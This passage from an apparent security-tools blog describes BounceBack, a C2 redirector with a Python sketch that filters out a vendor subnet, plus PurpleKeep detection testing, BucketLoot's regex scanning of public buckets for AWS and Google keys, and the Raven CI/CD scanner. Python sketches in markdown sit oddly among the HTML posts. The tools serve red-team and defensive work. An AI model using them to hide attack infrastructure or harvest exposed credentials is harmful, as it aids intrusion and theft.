combinations</li> <li>IP and subnet analysis</li> <li>IP geolocation fields inspection</li> <li>Reverse lookup domain probe</li> <li>Raw packet regexp matching</li> <li>Malleable C2 profiles traffic validation</li> <li>Work (or not) hours rule</li> </ul> <p dir="auto">Custom rules may be easily added; just register your <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/rules/default.go#L9" rel="nofollow" target="_blank" title="RuleBaseCreator">RuleBaseCreator</a> or <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/rules/default.go#L3" rel="nofollow" target="_blank" title="RuleWrapperCreator">RuleWrapperCreator</a>. See the already created <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/rules/base_common.go" rel="nofollow" target="_blank" title="RuleBaseCreators">RuleBaseCreators</a> and <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/rules/wrappers.go" rel="nofollow" target="_blank" title="RuleWrapperCreators">RuleWrapperCreators</a>.</p> <p dir="auto">The rules configuration page may be found <a href="https://github.com/D00Movenok/BounceBack/wiki/1.-Rules" rel="nofollow" target="_blank" title="here">here</a>.</p> <h2 dir="auto" tabindex="-1">Proxies</h2> <p dir="auto">At the moment, BounceBack supports the following protocols:</p> <ul dir="auto"> <li>HTTP(s) for your web infrastructure</li> <li>DNS for your DNS tunnels</li> <li>Raw TCP (with or without TLS) and UDP for custom protocols</li> </ul> <p dir="auto">Custom protocols may be easily added; just register your new type <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/proxy/manager.go" rel="nofollow" target="_blank" title="in manager">in manager</a>. 
Example proxy implementations may be found <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/proxy" rel="nofollow" target="_blank" title="here">here</a>.</p> <p dir="auto">The proxies configuration page may be found <a href="https://github.com/D00Movenok/BounceBack/wiki/2.-Proxies" rel="nofollow" target="_blank" title="here">here</a>.</p> <h2 dir="auto" tabindex="-1">Installation</h2> <p dir="auto">Just download the latest release from the <a href="https://github.com/D00Movenok/BounceBack/releases" rel="nofollow" target="_blank" title="release page">release page</a>, unzip it, edit the config file, and go.</p> <p dir="auto">If you want to build it from source, <a href="https://goreleaser.com/install/" rel="nofollow" target="_blank" title="install goreleaser">install goreleaser</a> and run:</p> <div><pre><code>goreleaser release --clean --snapshot</code></pre></div><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/D00Movenok/BounceBack" rel="nofollow" target="_blank" title="Download BounceBack">Download BounceBack</a></span></b></div></div></article>
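<p>BounceBack itself is written in Go and configured via YAML, but the boolean-based (and, or, not) rule combination it describes can be illustrated with a small Python sketch. The rule names and request shape here are invented for the example:</p>

```python
import ipaddress
import re

def ip_in_subnet(subnet):
    net = ipaddress.ip_network(subnet)
    return lambda req: ipaddress.ip_address(req["ip"]) in net

def header_matches(name, pattern):
    rx = re.compile(pattern)
    return lambda req: bool(rx.search(req["headers"].get(name, "")))

def not_(rule):
    return lambda req: not rule(req)

def and_(*rules):
    return lambda req: all(rule(req) for rule in rules)

def or_(*rules):
    return lambda req: any(rule(req) for rule in rules)

# Allow traffic only if it is NOT from a known-vendor subnet AND the
# User-Agent matches what the C2 profile expects.
allow = and_(
    not_(ip_in_subnet("198.51.100.0/24")),   # hypothetical vendor range
    header_matches("User-Agent", r"Mozilla/5\.0"),
)

visitor = {"ip": "203.0.113.7", "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0)"}}
scanner = {"ip": "198.51.100.9", "headers": {"User-Agent": "curl/8.0"}}
print(allow(visitor), allow(scanner))  # True False
```

<p>Because each rule is just a predicate over the incoming request, arbitrary pipelines can be built by nesting the combinators, which is the same composition model BounceBack's YAML rules express.</p>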
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-76476692086194165692024-02-18T15:58:00.000-08:002024-02-18T15:58:05.005-08:00PurpleKeep - Providing Azure Pipelines To Create An Infrastructure And Run Atomic Tests<article><div class="post-body entry-content" id="post-body-3884830259231703358" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo"><img alt="" border="0" height="258" id="BLOGGER_PHOTO_ID_7310071996835853026" src="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo=w640-h258" width="640" /></a></p><div><br /></div> <p dir="auto">With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.</p> <p dir="auto">To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. 
Leveraging the capabilities of the <a href="https://atomicredteam.io" rel="nofollow" target="_blank" title="Atomic Red Team project">Atomic Red Team project</a>, which makes it possible to simulate attacks following <a href="https://attack.mitre.org/" rel="nofollow" target="_blank" title="MITRE TTPs">MITRE TTPs</a> (Tactics, Techniques, and Procedures), PurpleKeep enhances the simulation of these TTPs to serve as a starting point for evaluating the effectiveness of detection rules.</p> <p dir="auto">Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.</p> <p dir="auto">Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. 
PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.</p> <p dir="auto">To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.</p> <p dir="auto">TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.</p> <h2 dir="auto" tabindex="-1">Requirements</h2> <p dir="auto">The project is based on Azure Pipelines and requires the following to be able to run:</p> <ul dir="auto"> <li>Azure Service Connection to a resource group as described in the <a href="https://learn.microsoft.com/en-us/azure/devops/pipelines/library/service-endpoints?view=azure-devops&tabs=yaml" rel="nofollow" target="_blank" title="Microsoft Docs">Microsoft Docs</a></li> <li>Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application</li> <li>MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and made accessible to the pipelines</li> </ul> <h3 dir="auto" tabindex="-1">Optional</h3> <p dir="auto">You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. 
Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.</p> <p dir="auto">Refer to the <a href="https://github.com/Retrospected/PurpleKeep/blob/main/variables.yml" rel="nofollow" target="_blank" title="variables">variables</a> file for your configurable items.</p> <h2 dir="auto" tabindex="-1">Design</h2> <p dir="auto" style="text-align: center;"><a href="https://github.com/Retrospected/PurpleKeep/blob/main/docs/PurpleKeep_1.0.jpg" rel="nofollow" target="_blank" title="Providing Azure pipelines to create an infrastructure and run Atomic tests. (9)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo"><img alt="" border="0" height="258" id="BLOGGER_PHOTO_ID_7310071996835853026" src="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo=w640-h258" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Infrastructure</h2> <p dir="auto">Deploying the infrastructure uses the Azure Pipeline to perform the following steps:</p> <ul dir="auto"> <li>Deploy Azure services: <ul dir="auto"> <li>Key Vault</li> <li>Log Analytics Workspace</li> <li>Data Connection Endpoint</li> <li>Data Connection Rule</li> </ul> </li> <li>Generate SSH keypair and password for the Windows account and store in the Key Vault</li> <li>Create a Windows 11 VM</li> <li>Install OpenSSH</li> <li>Configure and deploy the SSH public key</li> <li>Install Invoke-AtomicRedTeam</li> <li>Install Microsoft Defender for Endpoint and configure exceptions</li> <li>(Optional) Apply security and/or audit policy files</li> <li>Reboot</li> </ul> <h2 dir="auto" tabindex="-1">Simulation</h2> <p 
dir="auto">Currently, only the Atomics from the public repository are supported. The pipeline takes a single Technique ID or a comma-separated list of techniques as input, for example:</p> <ul dir="auto"> <li>T1059.003</li> <li>T1027,T1049,T1003</li> </ul> <p dir="auto">The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.</p> <p dir="auto">There are currently two ways to run the simulation:</p> <h3 dir="auto" tabindex="-1"><a href="https://github.com/Retrospected/PurpleKeep/blob/main/rotate_simulation.yml" rel="nofollow" target="_blank" title="Rotating simulation">Rotating simulation</a></h3> <p dir="auto">This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytics workspace will retain the logs of each run.</p> <p dir="auto"><strong>Warning: this will onboard a large number of hosts into your EDR</strong></p> <h3 dir="auto" tabindex="-1"><a href="https://github.com/Retrospected/PurpleKeep/blob/main/single_deploy_simulation.yml" rel="nofollow" target="_blank" title="Single deploy simulation">Single deploy simulation</a></h3> <p dir="auto">A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTPs will be simulated on this instance. 
This is the fastest way to simulate and prevents onboarding a large number of devices; however, running many simulations in the same environment risks contaminating it and making the simulations less stable and predictable.</p> <h2 dir="auto" tabindex="-1">TODO</h2> <h3 dir="auto" tabindex="-1">Must have</h3> <ul class="contains-task-list"> <li class="task-list-item">Check if pre-reqs have been fulfilled before executing the atomic</li> <li class="task-list-item">Provide the ability to import your own group policy</li> <li class="task-list-item">Clean up Bicep files and pipelines by using a master template (Complete build)</li> <li class="task-list-item">Build a pipeline that runs techniques sequentially with reboots in between</li> <li class="task-list-item">Add the Azure ServiceConnection to variables instead of parameters</li> </ul> <h3 dir="auto" tabindex="-1">Nice to have</h3> <ul class="contains-task-list"> <li class="task-list-item">MDE Off-boarding (?)</li> <li class="task-list-item">Automatically join and leave an AD domain</li> <li class="task-list-item">Make the Atomics repository configurable</li> <li class="task-list-item">Deploy VECTR as part of the infrastructure and ingest results during simulation. 
Also see the <a data-hovercard-type="issue" data-hovercard-url="/SecurityRiskAdvisors/VECTR/issues/235/hovercard" href="https://github.com/SecurityRiskAdvisors/VECTR/issues/235" rel="nofollow" target="_blank" title="VECTR API issue">VECTR API issue</a></li> <li class="task-list-item">Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)</li> <li class="task-list-item">Add C2 infrastructure for manual or C2 based simulations</li> </ul> <h2 dir="auto" tabindex="-1">Issues</h2> <ul class="contains-task-list"> <li class="task-list-item">Atomics do not return if a simulation succeeded or not</li> <li class="task-list-item">Unreliable OpenSSH extension installer failing infrastructure deployment</li> <li class="task-list-item">Spamming onboarded devices in the EDR</li> </ul> <h2 dir="auto" tabindex="-1">References</h2> <ul dir="auto"> <li><a href="https://github.com/splunk/attack_range" rel="nofollow" target="_blank" title="Splunk's Attack Range">Splunk's Attack Range</a></li> <li><a href="https://vimeo.com/819912016/c76af1ca39" rel="nofollow" target="_blank" title="Sp4rkCon 2023 - Continuous End-to-End Detection Validation and Reporting with Carrie Roberts">Sp4rkCon 2023 - Continuous End-to-End Detection Validation and Reporting with Carrie Roberts</a></li> <li><a href="https://redcanary.com/blog/coalmine/" rel="nofollow" target="_blank" title="Red Canary's Coalmine">Red Canary's Coalmine</a></li></ul><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Retrospected/PurpleKeep" rel="nofollow" target="_blank" title="Download PurpleKeep">Download PurpleKeep</a></span></b></div></div></article>
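The Simulation pipeline above accepts either a single technique ID or a comma-separated list (e.g. T1027,T1049,T1003). A minimal Python sketch of validating that parameter before triggering a run; the function name and the strictness of the ID pattern are illustrative assumptions, not part of PurpleKeep:

```python
import re

# ATT&CK technique IDs look like T1059, with an optional .NNN sub-technique suffix.
TECHNIQUE_RE = re.compile(r"T\d{4}(\.\d{3})?")

def parse_techniques(value):
    """Split a comma-separated pipeline parameter into validated technique IDs."""
    ids = [t.strip() for t in value.split(",") if t.strip()]
    bad = [t for t in ids if not TECHNIQUE_RE.fullmatch(t)]
    if bad:
        raise ValueError(f"invalid technique IDs: {bad}")
    return ids

print(parse_techniques("T1027,T1049,T1003"))  # ['T1027', 'T1049', 'T1003']
print(parse_techniques("T1059.003"))          # ['T1059.003']
```

Rejecting malformed IDs up front avoids burning a full infrastructure deployment on a typo.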
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-27369691103492021082024-02-18T15:56:00.000-08:002024-02-18T15:56:00.459-08:00BucketLoot - An Automated S3-compatible Bucket Inspector<article><div class="post-body entry-content" id="post-body-1669689476304766213" itemprop="articleBody"><p dir="auto" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj8rfEc4U5KOQUZHwmHZ0iCUoXlCufLg5nG0YLO9hGiD4u1g2wCbTdy8fhUkFYEpIWSC4DuPifxlM_4vjj3a8nitJR4VbqeR-w0wqwJ2gonk_hNYJYDXF1C5iQ7O8Csi6CshbfSu95qFVrjdTLD4_sOCW0_H8FO0wJuGsVeEJ0PUHvWeSsvFAV8b6x9UN_3"><img alt="" border="0" height="444" id="BLOGGER_PHOTO_ID_7310071935771016082" src="https://blogger.googleusercontent.com/img/a/AVvXsEj8rfEc4U5KOQUZHwmHZ0iCUoXlCufLg5nG0YLO9hGiD4u1g2wCbTdy8fhUkFYEpIWSC4DuPifxlM_4vjj3a8nitJR4VbqeR-w0wqwJ2gonk_hNYJYDXF1C5iQ7O8Csi6CshbfSu95qFVrjdTLD4_sOCW0_H8FO0wJuGsVeEJ0PUHvWeSsvFAV8b6x9UN_3=w640-h444" width="640" /></a></p> <div><br /> BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text. <br /><br /> The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing. <br /><br /> BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens / Access Keys initially in order to run the scan. 
The tool will scrape a maximum of 1000 files returned in the XML response; if the storage bucket contains more than 1000 entries that the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our <a href="https://redhuntlabs.com/blog/introducing-bucketloot-an-automated-cloud-bucket-inspector/" rel="nofollow" target="_blank" title="blog">blog</a>.</div><span><a name="more"></a></span><div><br /></div> <div> <h2 dir="auto" tabindex="-1"> Features </h2> <h4 dir="auto" tabindex="-1"> Secret Scanning </h4> Scans for 80+ unique RegEx signatures that can help in uncovering secret exposures, tagged with their severity, from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the <a href="https://github.com/redhuntlabs/BucketLoot/blob/master/regexes.json" rel="nofollow" target="_blank" title="regexes.json">regexes.json</a> file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR! <h4 dir="auto" tabindex="-1"> Sensitive File Checks</h4> Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with an 80+ unique RegEx signature list in <a href="https://github.com/redhuntlabs/BucketLoot/blob/master/vulnFiles.json" rel="nofollow" target="_blank" title="vulnFiles.json">vulnFiles.json</a> which allows users to flag these sensitive files based on file names or extensions. <h4 dir="auto" tabindex="-1"> Dig Mode </h4> Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and lets the tool scrape URLs from the response body for scanning. 
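The 1000-file cap described above comes from the S3-compatible ListObjects API, which returns at most 1,000 keys per XML page and sets IsTruncated when more remain. A hedged Python sketch of parsing one listing page; the XML is inlined here for illustration, whereas a real scan would fetch it over HTTP from the public bucket endpoint:

```python
import xml.etree.ElementTree as ET

# Sample ListBucketResult page, as returned by a public S3-compatible endpoint.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>example-bucket</Name>
  <IsTruncated>true</IsTruncated>
  <Contents><Key>backup/db.sql</Key></Contents>
  <Contents><Key>assets/logo.png</Key></Contents>
</ListBucketResult>"""

NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"

def parse_listing(xml_text):
    """Return (keys, truncated) from one ListBucketResult page."""
    root = ET.fromstring(xml_text)
    keys = [c.findtext(f"{NS}Key") for c in root.findall(f"{NS}Contents")]
    truncated = root.findtext(f"{NS}IsTruncated") == "true"
    return keys, truncated

keys, truncated = parse_listing(SAMPLE)
print(keys)       # ['backup/db.sql', 'assets/logo.png']
print(truncated)  # True -> more pages exist; credentials are needed for a full crawl
```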
<h4 dir="auto" tabindex="-1"> Asset Extraction </h4> Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools. <h4 dir="auto" tabindex="-1"> Searching </h4> The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.</div><div><br /></div> <div> <h2 dir="auto" tabindex="-1"> Acknowledgements </h2> <ul dir="auto" type="disc"> <li><a href="https://www.blackhat.com/us-23/arsenal/schedule/#bucketloot---an-automated-s-bucket-inspector-33536" rel="nofollow" target="_blank" title="Black Hat USA 2023 [Arsenal]">Black Hat USA 2023 [Arsenal]</a></li> <li><a href="https://blackhatmea.com/session/bucketloot-automated-s3-bucket-inspector" rel="nofollow" target="_blank" title="Black Hat MEA 2023 [Arsenal]">Black Hat MEA 2023 [Arsenal]</a></li> <li><a href="https://www.blackhat.com/eu-23/arsenal/schedule/index.html#bucketloot---an-automated-s-compatible-bucket-inspector-35800" rel="nofollow" target="_blank" title="Black Hat EU 2023 [Arsenal]">Black Hat EU 2023 [Arsenal]</a></li> </ul> </div> <p dir="auto"><em><a href="https://redhuntlabs.com/nvadr" rel="nofollow" target="_blank" title="BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text. 
(20)">To know more about our Attack Surface Management platform, check out NVADR.</a></em></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/redhuntlabs/BucketLoot" rel="nofollow" target="_blank" title="Download BucketLoot">Download BucketLoot</a></span></b></div></div></article>
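BucketLoot's secret scanning boils down to running a library of named regular expressions over each plain-text file. A minimal sketch in that spirit; the two signatures below are common public patterns, not BucketLoot's actual regexes.json entries, whose schema may differ:

```python
import re

# Illustrative signatures only; BucketLoot ships its own list in regexes.json.
SIGNATURES = {
    "AWS Access Key ID": r"AKIA[0-9A-Z]{16}",
    "Google API Key": r"AIza[0-9A-Za-z\-_]{35}",
}

def scan_text(text):
    """Return (signature name, matched string) pairs found in a plain-text file."""
    hits = []
    for name, pattern in SIGNATURES.items():
        for m in re.finditer(pattern, text):
            hits.append((name, m.group(0)))
    return hits

# AKIAIOSFODNN7EXAMPLE is the well-known placeholder key from the AWS docs.
sample = "config: aws_key=AKIAIOSFODNN7EXAMPLE\n"
print(scan_text(sample))  # [('AWS Access Key ID', 'AKIAIOSFODNN7EXAMPLE')]
```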
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-50897680764154688482024-02-18T15:53:00.000-08:002024-02-18T15:53:32.599-08:00Raven - CI/CD Security Analyzer<article><div class="post-body entry-content" id="post-body-8852427450713348385" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgyRJD1KzNj4g6TZU4paIfRlwntEhlE-1TTejSMgWUFloDHdFdiDkH20xf7Ao3Ukd_hYOhcAiDjnOQPKfNEhxkdCOp50oF6ILXtwOZ3ER6ydyZqo8L40HmFkhwFJFpcwmYcZ9HUppDQdEe1lTXpZ9a3Cizx4vdH8BodDisKTzncOM_tqg0SEv0gTojpIbqE"><img alt="" border="0" height="256" id="BLOGGER_PHOTO_ID_7310072230664940578" src="https://blogger.googleusercontent.com/img/a/AVvXsEgyRJD1KzNj4g6TZU4paIfRlwntEhlE-1TTejSMgWUFloDHdFdiDkH20xf7Ao3Ukd_hYOhcAiDjnOQPKfNEhxkdCOp50oF6ILXtwOZ3ER6ydyZqo8L40HmFkhwFJFpcwmYcZ9HUppDQdEe1lTXpZ9a3Cizx4vdH8BodDisKTzncOM_tqg0SEv0gTojpIbqE=w640-h256" width="640" /></a></p><p style="text-align: center;"><br /></p> <p dir="auto"><strong>RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD)</strong> is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. 
Developed and maintained by the <a href="https://cycode.com/?utm_source=github_website&utm_medium=referral&utm_campaign=raven_page" rel="nofollow" target="_blank" title="Cycode">Cycode</a> research team.</p> <p dir="auto">With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:</p> <ul dir="auto"> <li><a href="https://github.com/freeCodeCamp/freeCodeCamp" rel="nofollow" target="_blank" title="FreeCodeCamp">FreeCodeCamp</a> (the most popular project on GitHub)</li> <li><a href="https://github.com/storybookjs/storybook" rel="nofollow" target="_blank" title="Storybook">Storybook</a> (One of the most popular frontend frameworks)</li> <li><a href="https://github.com/microsoft/fluentui" rel="nofollow" target="_blank" title="Fluent UI">Fluent UI</a> by Microsoft</li> <li>and much more</li> </ul> <p dir="auto">We listed all vulnerabilities discovered using Raven in the tool <a href="https://github.com/CycodeLabs/raven#hall-of-fame---vulnerabilities-found-and-disclosed-using-raven" rel="nofollow" target="_blank" title="Hall of Fame">Hall of Fame</a>.</p> <h2 dir="auto" tabindex="-1">What is Raven</h2> <p dir="auto">The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:</p> <ul dir="auto"> <li><strong>Downloader:</strong> You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.</li> <li><strong>Indexer:</strong> Digesting the downloaded data into a graph-based Neo4j database. 
This process involves establishing relationships between workflows, actions, jobs, steps, etc.</li> <li><strong>Query Library:</strong> We created a library of pre-defined queries based on research conducted by the community.</li> <li><strong>Reporter:</strong> Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.</li> </ul> <p dir="auto">Possible usages for Raven:</p> <ul dir="auto"> <li>Scanner for your own organization's security</li> <li>Scanning specified organizations for bug bounty purposes</li> <li>Scan everything and report issues found to save the internet</li> <li>Research and learning purposes</li> </ul> <p dir="auto">This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.</p> <h2 dir="auto" tabindex="-1">Why Raven</h2> <p dir="auto">In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. 
This has been proven several times in our previous content:</p> <ul dir="auto"> <li>A simple injection scenario exposed dozens of public repositories, including popular open-source projects.</li> <li>We found that one of the most popular frontend frameworks was vulnerable to an innovative branch injection attack.</li> <li>We detailed a completely different attack vector, third-party integration risks, affecting the most popular project on GitHub and thousands more.</li> <li>Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.</li> <li>Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.</li> </ul> <p dir="auto">Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, the vulnerabilities share a commonality – each exploitation can impact millions of victims.</p> <p dir="auto">It was for these reasons that Raven was created: a framework for CI/CD security analysis of workflows, with GitHub Actions as the first use case. 
In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.</p> <h2 dir="auto" tabindex="-1">Setup && Run</h2> <p dir="auto">To get started with Raven, follow these installation instructions:</p> <p dir="auto"><strong>Step 1</strong>: Install the Raven package</p> <div><pre><code>pip3 install raven-cycode</code></pre></div> <p dir="auto"><strong>Step 2</strong>: Setup a local Redis server and Neo4j database</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12 docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1" dir="auto"><pre><code>docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12<br />docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1</code></pre></div> <p dir="auto">Another way to setup the environment is by running our provided docker compose file:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/CycodeLabs/raven.git cd raven make setup" dir="auto"><pre><code>git clone https://github.com/CycodeLabs/raven.git<br />cd raven<br />make setup</code></pre></div> <p dir="auto"><strong>Step 3</strong>: Run Raven Downloader</p> <p dir="auto">Org mode:</p> <div><pre><code>raven download org --token $GITHUB_TOKEN --org-name RavenDemo</code></pre></div> <p dir="auto">Crawl mode:</p> <div><pre><code>raven download crawl --token $GITHUB_TOKEN --min-stars 1000</code></pre></div> <p dir="auto"><strong>Step 4</strong>: Run Raven Indexer</p> <div><pre><code>raven index</code></pre></div> <p dir="auto"><strong>Step 5</strong>: Inspect the results through 
the reporter</p> <div><pre><code>raven report --format raw</code></pre></div> <p dir="auto">At this point, it is possible to inspect the data in the Neo4j database by connecting to <a href="http://localhost:7474/browser/" rel="nofollow" target="_blank" title="http://localhost:7474/browser/">http://localhost:7474/browser/</a>.</p> <h3 dir="auto" tabindex="-1">Prerequisites</h3> <ul dir="auto"> <li>Python 3.9+</li> <li>Docker Compose v2.1.0+</li> <li>Docker Engine v1.13.0+</li> </ul> <h2 dir="auto" tabindex="-1">Infrastructure</h2> <p dir="auto">Raven uses two primary Docker containers: Redis and Neo4j. <code>make setup</code> will run a <code>docker compose</code> command to prepare that environment.</p> <p dir="auto" style="text-align: center;"><a href="https://raw.githubusercontent.com/CycodeLabs/raven/main/assets/images/infrastructure.png" rel="nofollow" target="_blank" title="CI/CD Security Analyzer (13)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgv_E2iPqCpHZH80qzyKIybdhk9fzasZeCDuZoBvVh_WrSE_ay29fW2MW_YB0FlUqy9EbSuscREU2CCla6QH27DM8Bdu8rOx4Fe_vwLw6xsx2FanSmAW0MbLH_jWo2FsN3SqX7oguQJXroWLWl2050DeZr6ZhK5el-hictfnNaqugcJSIJxiPtfmV_ksMWc"><img alt="" border="0" height="378" id="BLOGGER_PHOTO_ID_7310072252736706674" src="https://blogger.googleusercontent.com/img/a/AVvXsEgv_E2iPqCpHZH80qzyKIybdhk9fzasZeCDuZoBvVh_WrSE_ay29fW2MW_YB0FlUqy9EbSuscREU2CCla6QH27DM8Bdu8rOx4Fe_vwLw6xsx2FanSmAW0MbLH_jWo2FsN3SqX7oguQJXroWLWl2050DeZr6ZhK5el-hictfnNaqugcJSIJxiPtfmV_ksMWc=w640-h378" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">The tool contains three main functionalities: <code>download</code>, <code>index</code>, and <code>report</code>.</p> <h3 dir="auto" tabindex="-1">Download</h3> <h4 dir="auto" tabindex="-1">Download Organization Repositories</h4> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: raven download org [-h] --token TOKEN 
